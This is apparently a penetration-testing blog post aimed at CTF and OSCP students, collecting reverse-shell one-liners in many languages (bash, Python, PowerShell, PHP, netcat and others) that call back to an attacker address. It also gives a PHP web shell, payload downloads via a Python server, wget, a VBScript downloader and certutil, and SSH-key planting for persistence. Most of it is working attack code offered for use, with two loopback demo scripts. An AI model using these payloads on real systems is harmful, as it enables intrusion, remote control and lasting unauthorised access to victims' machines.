The ultimate reverse shell, file transfer and persistence collection


She sells sea shells by the sea shore

If you are taking part in capture the flag competitions, studying for the OSCP (like me), or lucky enough to land a shell on a victim box during an active penetration test engagement, here is a list of useful one-liner reverse shells. Be warned: as I started writing this post it grew beyond reverse shells to include file transfer methods, since you will usually want to do both, plus an SSH-key recipe at the end that doubles as persistence.

I will be actively adding to this list so feel free to bookmark or contribute.

AWK Reverse shell

# requires gawk: the /inet/ special files and the |& coprocess operator are gawk extensions, mawk/busybox awk will not run this
awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

 

Socat Reverse shell

# Attack box 
socat file:`tty`,raw,echo=0 tcp-listen:4444

 

# Victim box (interactive TTY shell; socat is rarely installed on targets, so upload a static socat binary first if you need to)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4444

 

Powershell Reverse shell

# run from cmd.exe; the whole script is double-quoted so cmd does not interpret the pipes, and the socket is assigned to $client (the widely copied version of this one-liner omits the assignment and fails at $client.GetStream())
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('ip-address',port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

 

Bash Reverse shell

# /dev/tcp is a bash feature, so this must run under bash: it will not work from /bin/sh on systems where sh is dash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

 

Perl Reverse shell

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Python Reverse shell

# works under python 2 and 3 (call python3 explicitly on hosts that have no "python" binary)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
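
The one-liner above works because os.dup2() points file descriptors 0, 1 and 2 at the socket before /bin/sh starts, so the shell reads its commands from the connection and writes its output back down it. The following is an added example, not code from the original post, that runs both ends of that exchange on 127.0.0.1 in a single script: a listener standing in for the attack box (the nc -lvnp role) and a connect-back that hands /bin/sh the socket as its three standard descriptors. The commands it sends are constructed for the demonstration; on a real engagement the victim side is the one-liner and the listener is whatever you have on the attack box.

```python
import socket
import subprocess
import threading


def reverse_shell(host, port):
    """Victim side. Connects back and hands the socket to /bin/sh as stdin,
    stdout and stderr, which is exactly what the os.dup2() calls in the
    one-liner do. Popen does the dup2 in the child instead of in this
    process, so the script keeps its own terminal and can also run the
    listener."""
    sock = socket.create_connection((host, port))
    fd = sock.fileno()
    proc = subprocess.Popen(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd)
    sock.close()        # the child already holds its own copies of the descriptor
    return proc.wait()  # returns once the shell exits (EOF or "exit")


def catch_shell(commands, timeout=15):
    """Attacker side. Listens on an ephemeral loopback port, waits for the
    connect-back, sends each command followed by "exit", and returns
    everything the remote shell wrote to the socket."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    # Launch the "victim" in a thread so one script demonstrates both ends.
    victim = threading.Thread(target=reverse_shell, args=("127.0.0.1", port), daemon=True)
    victim.start()

    conn, _ = srv.accept()
    conn.settimeout(timeout)
    conn.sendall(("\n".join(commands) + "\nexit\n").encode())

    chunks = []
    try:
        while True:
            data = conn.recv(4096)
            if not data:  # shell exited, so its stdout/stderr (the socket) closed
                break
            chunks.append(data)
    except socket.timeout:
        pass
    finally:
        conn.close()
        srv.close()
    victim.join(timeout)
    return b"".join(chunks).decode(errors="replace")


def demo():
    # Constructed commands with deterministic output; nothing here touches the host.
    return catch_shell(["echo reverse shell says hello", "echo exit code $?"])


if __name__ == "__main__":
    print(demo(), end="")
```

Without the `-i` flag the shell prints no prompt, which is why the output comes back clean; the one-liners use `-i` so that you get a prompt and job control hints when driving the shell by hand.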

 

PHP Reverse shells

# assumes the socket lands on file descriptor 3, the first free descriptor in a fresh php -r process; if it does not, try 4, 5 or 6
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

 

Simple PHP shell to get a file onto a server and then to execute the file

<?php
// Drop this in the web root. ?fupload=<name> pulls <name> from the attack box's
// web server (10.0.0.1:1234) and writes it into the web server's working directory;
// ?fexec=<command> runs the command and returns its output.
if (isset($_REQUEST['fupload'])) {
  file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.0.0.1:1234/" . $_REQUEST['fupload']));
}

if (isset($_REQUEST['fexec'])) {
  echo shell_exec($_REQUEST['fexec']);
}

 

Ruby Reverse shell

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

Netcat Reverse shell

# only works when nc was built with -e (nc.traditional / ncat); the OpenBSD netcat most distributions ship does not have it
nc -e /bin/sh 10.0.0.1 1234
# portable version for netcat builds without -e: a named pipe carries the listener's input back into the shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

 

# Upgrade to a TTY shell (works for most of the shells above; I use it most often with netcat). Use python3 on hosts with no "python" binary.
python -c 'import pty; pty.spawn("/bin/bash")'

 

Java Reverse shell

// Groovy syntax (list literal, "as String[]" and the \$ escape), not plain Java: run it where a Groovy script console is available
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

 

Groovy Reverse shell

// Works as Groovy (java.io and java.net are auto-imported) or as the body of a Java method with those imports.
// Point host at the attack box and set cmd to "/bin/sh" on Linux targets.
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());   // process stdout -> socket
  while(pe.available()>0)so.write(pe.read());   // process stderr -> socket
  while(si.available()>0)po.write(si.read());   // socket -> process stdin
  so.flush();po.flush();Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){} // exitValue throws while the process is still running
};
p.destroy();s.close();

 

Python local server / file transfer

Once you have a shell you usually want to get something up onto the box. Python is my usual go-to for spinning up a quick web server to wget a file from (assuming your IP is 192.168.0.10 and the file malicious.sh sits in the folder you started the Python server from). Everything in that folder is served to anyone who can reach the port, so keep it running only for as long as you need it.

# <= Python 2
python -m SimpleHTTPServer 8000
# >= Python 3
python3 -m http.server 8000

And retrieve the file using wget on Linux

wget http://192.168.0.10:8000/malicious.sh
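
As an added example, not from the original post, here is the same transfer done from Python together with the check most people skip: take the file's hash on the attack box before serving it and compare it on the other side, so a truncated or tampered download is caught before it is executed. The script serves a constructed temporary directory on an ephemeral loopback port using the same SimpleHTTPRequestHandler that python3 -m http.server uses, fetches the file the way wget would, verifies the SHA-256, and then truncates the copy to show the check failing. The file name malicious.sh and its contents are made up for the demonstration.

```python
import functools
import hashlib
import http.server
import os
import shutil
import tempfile
import threading
import urllib.request


class QuietHandler(http.server.SimpleHTTPRequestHandler):
    """Same handler python3 -m http.server uses, minus the per-request log line."""
    def log_message(self, format, *args):
        pass


def serve_directory(directory):
    """Start the equivalent of `python3 -m http.server` for `directory` on an
    ephemeral loopback port, in a background thread. Returns (server, port)."""
    handler = functools.partial(QuietHandler, directory=directory)
    httpd = http.server.HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd, httpd.server_address[1]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


# Explicitly empty proxy map so an http_proxy variable cannot redirect the loopback fetch.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def fetch(url, dest):
    """The wget/certutil side: stream the HTTP response straight to disk."""
    with _opener.open(url, timeout=10) as resp, open(dest, "wb") as out:
        shutil.copyfileobj(resp, out)
    return dest


def verify_download(path, expected_sha256):
    """Compare the fetched file against the digest taken on the attack box."""
    return sha256_file(path) == expected_sha256


def transfer_demo():
    """Stage a constructed payload, serve it, fetch it, verify it, then damage
    the copy and verify again. Returns (intact, truncated_passes, digest)."""
    srv_dir = tempfile.mkdtemp(prefix="attackbox_")
    victim_dir = tempfile.mkdtemp(prefix="victim_")
    payload = os.path.join(srv_dir, "malicious.sh")
    with open(payload, "wb") as f:  # constructed sample content, not a real tool
        f.write(b"#!/bin/sh\necho 'constructed sample payload'\n" * 2000)
    expected = sha256_file(payload)  # digest taken before the file leaves the attack box

    httpd, port = serve_directory(srv_dir)
    try:
        got = fetch(f"http://127.0.0.1:{port}/malicious.sh",
                    os.path.join(victim_dir, "malicious.sh"))
        intact = verify_download(got, expected)
        with open(got, "r+b") as f:  # simulate a transfer cut short
            f.truncate(100)
        truncated_passes = verify_download(got, expected)
        return intact, truncated_passes, expected
    finally:
        httpd.shutdown()
        httpd.server_close()
        shutil.rmtree(srv_dir, ignore_errors=True)
        shutil.rmtree(victim_dir, ignore_errors=True)


if __name__ == "__main__":
    intact, truncated_passes, digest = transfer_demo()
    print(f"sha256={digest} intact={intact} truncated_passes={truncated_passes}")
```

On an engagement the manual equivalent is `sha256sum malicious.sh` on the attack box and again on the Linux victim after the wget (or `certutil -hashfile malicious.exe SHA256` on Windows); if the two digests differ, fetch again rather than run a half-written file.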

 

Windows does not ship with wget, so the old OSCP-era way is to build a small VBScript that does the same job (see CertUtil below for the easier option). Paste the following into a cmd.exe prompt on the victim, and press Enter once more after the last line so it is actually written to wget.vbs:

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
# then still on the victim machine use cscript to execute the vbscript "wget.vbs" to download the file:
cscript wget.vbs http://192.168.0.10:8000/malicious.exe malicious.exe

 

Or, if possible, save yourself some hassle and live off the land with certutil, which can download a file in one line. Be aware that certutil fetching from a URL is a well-known indicator that AV/EDR products flag, and that -urlcache leaves a copy of the download in the user's URL cache:

certutil -urlcache -f http://192.168.0.10:8000/malicious.exe malicious.exe

 

Rsync’ing files/folders between Linux servers.

Not a reverse shell, but a quick and dirty method that is useful for moving files between servers once a foothold has been obtained. The key you plant is also persistence for that account, so record it and remove it from authorized_keys when the engagement ends.

# attack box
ssh-keygen -t rsa -b 4096 -C "[email protected]"  -f ~/.ssh/id_rsa_hacker
# attack box (ssh-keygen already creates the private key with mode 600; set it explicitly if you copied the key from elsewhere, as ssh refuses keys that are group or world readable)
chmod 600 ~/.ssh/id_rsa_hacker
# cat and copy the contents of your new SSH public key, i.e. id_rsa_hacker.pub, then switch to the victim box and append it as one line to ~/.ssh/authorized_keys for the user you will ssh in as (the file must be mode 600 and ~/.ssh mode 700, or sshd ignores it)
cat ~/.ssh/id_rsa_hacker.pub

You can now ssh freely one way (provided everything went smoothly); for two-way access repeat the process in the other direction.

# To upload any file or folder use the following changing _PORT_/_FILE2TRANSFER_/_VICTIM_USER_/_VICTIM_IP_ etc as needs be
rsync -rvz -e 'ssh -p _PORT_ -i ~/.ssh/id_rsa_hacker' --progress _FILE2TRANSFER_ _VICTIM_USER_@_VICTIM_IP_:~/
